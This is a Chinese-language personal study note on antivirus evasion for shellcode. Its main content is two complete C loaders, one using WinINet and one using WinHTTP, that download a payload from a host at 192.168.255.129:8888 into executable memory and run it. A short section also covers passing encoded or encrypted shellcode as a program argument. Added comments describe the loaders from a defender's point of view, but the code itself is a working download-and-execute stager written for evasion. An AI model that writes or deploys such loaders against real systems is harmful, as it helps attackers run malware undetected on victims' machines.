免杀笔记

很久之前接触过静态免杀,不过由于自己懒的原因没有继续学习下去,故而又来填坑,就浅浅地记录下自己从头开始学习免杀的过程,看看还能坚持多久。

shellcode免杀

payload传输

1.从文件读取shellcode

需要用到以下的api

CreateFile

HANDLE CreateFileA(
[in] LPCSTR lpFileName,
[in] DWORD dwDesiredAccess,
[in] DWORD dwShareMode,
[in, optional] LPSECURITY_ATTRIBUTES lpSecurityAttributes,
[in] DWORD dwCreationDisposition,
[in] DWORD dwFlagsAndAttributes,
[in, optional] HANDLE hTemplateFile
);

参考: https://learn.microsoft.com/zh-cn/windows/win32/api/fileapi/nf-fileapi-createfilea

GetFileSize

DWORD GetFileSize(
[in] HANDLE hFile,
[out, optional] LPDWORD lpFileSizeHigh
);

参考: https://learn.microsoft.com/zh-cn/windows/win32/api/fileapi/nf-fileapi-getfilesize

ReadFile

BOOL ReadFile(
[in] HANDLE hFile,
[out] LPVOID lpBuffer,
[in] DWORD nNumberOfBytesToRead,
[out, optional] LPDWORD lpNumberOfBytesRead,
[in, out, optional] LPOVERLAPPED lpOverlapped
);

参考: https://learn.microsoft.com/zh-cn/windows/win32/api/fileapi/nf-fileapi-readfile

2. 从http读取

直接贴代码
wininet

#include <windows.h>

#pragma comment(lib,"wininet")

#include <wininet.h>




/*
 * Download-and-execute loader, WinINet flavour (kept as a study sample).
 *
 * Fetches http://host:port/path into a freshly allocated RWX buffer and
 * transfers control to it. No call result is checked along the way, and
 * the handles are only released if the downloaded code returns.
 *
 * Defender's view of the observable chain in this function:
 *   VirtualAlloc(PAGE_EXECUTE_READWRITE)      -> private RWX memory
 *   InternetOpen/InternetConnect/HttpOpenRequest
 *                                            -> plain HTTP GET, fixed UA "Mozilla"
 *   ((void(*)())exec)()                       -> call into non-image memory
 * Each of those is a common behavioural or network detection point for
 * this class of loader.
 */
int main()

{

void* exec;

// Fixed buffer size for the response body; the read below is capped at this.
int payload_len = 4096;



char host[] = "192.168.255.129";

WORD port = 8888;

char path[] = "/calc.bin";



HINTERNET session;

HINTERNET conn;

HINTERNET reqfile;

// Bytes actually read by InternetReadFile; written once, never consulted.
DWORD nread;




// payload_len bytes that are readable, writable and executable at once.
exec = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);



// Open a WinINet session with the preconfigured (system proxy) settings.

session = InternetOpen("Mozilla", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);

// Connect to the target host over HTTP, anonymous (empty user/password).

conn = InternetConnect(session, host, port, "", "", INTERNET_SERVICE_HTTP, 0, 0);

// Build a GET request for `path` with default version/referer/accept types.

reqfile = HttpOpenRequest(conn, "GET", path, NULL, NULL, NULL, 0, 0);

// Send the request and copy the response body straight into the RWX buffer.

HttpSendRequest(reqfile, NULL, 0, 0, 0);

InternetReadFile(reqfile, exec, payload_len, &nread);



// Treat the downloaded bytes as code and call them.
((void(*)())exec)();

// Close all handles (reached only if the payload returns control).

InternetCloseHandle(reqfile);

InternetCloseHandle(conn);

InternetCloseHandle(session); c
}

winhttp

#include <windows.h>

#include <stdint.h>

#include <winhttp.h>

#pragma comment(lib,"winhttp")



/*
 * Download-and-execute loader, WinHTTP flavour (kept as a study sample).
 *
 * Same behaviour as the WinINet version: fetch http://host:port/path into
 * a freshly allocated RWX buffer and transfer control to it. No call result
 * is checked, and the handles are only released if the downloaded code
 * returns.
 *
 * Defender's view of the observable chain in this function:
 *   VirtualAlloc(PAGE_EXECUTE_READWRITE)        -> private RWX memory
 *   WinHttpOpen/WinHttpConnect/WinHttpOpenRequest
 *                                              -> plain HTTP GET (flags 0, no TLS),
 *                                                 fixed UA "Mozilla/4.0"
 *   ((void(*)())exec)()                         -> call into non-image memory
 * Each of those is a common behavioural or network detection point for
 * this class of loader.
 */
int main()

{

void* exec;

// Fixed buffer size for the response body; the read below is capped at this.
int payload_len = 4096;



// WinHTTP takes wide strings, hence the L"" literals.
wchar_t host[] = L"192.168.255.129";

WORD port = 8888;

wchar_t path[] = L"/calc.bin";



HINTERNET session;

HINTERNET conn;

HINTERNET reqfile;

// Bytes actually read by WinHttpReadData; written once, never consulted.
DWORD nread;




// payload_len bytes that are readable, writable and executable at once.
exec = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);



// Open a WinHTTP session using the default proxy configuration.

session = WinHttpOpen(L"Mozilla/4.0", WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, WINHTTP_NO_PROXY_NAME, WINHTTP_NO_PROXY_BYPASS, 0);

// Connect to the target host.

conn = WinHttpConnect(session, host, port, 0);

// Build a GET request for `path`; default HTTP version, no referer, default accept types, flags 0.

reqfile = WinHttpOpenRequest(conn, L"GET", path, NULL, WINHTTP_NO_REFERER, WINHTTP_DEFAULT_ACCEPT_TYPES, 0);

// Send the request, wait for the response, and copy its body straight into the RWX buffer.

WinHttpSendRequest(reqfile, WINHTTP_NO_ADDITIONAL_HEADERS, 0, WINHTTP_NO_REQUEST_DATA, 0, 0, 0);

WinHttpReceiveResponse(reqfile, NULL);

WinHttpReadData(reqfile, exec, payload_len, &nread);



// Treat the downloaded bytes as code and call them.
((void(*)())exec)();



// Close all handles (reached only if the payload returns control).

WinHttpCloseHandle(reqfile);

WinHttpCloseHandle(conn);

WinHttpCloseHandle(session);

}

3.参数接收shellcode

就是将shellcode转换成16进制、base64编码、aes加密等形式,当作参数传入程序,再进行解密加载。

shellcode 加密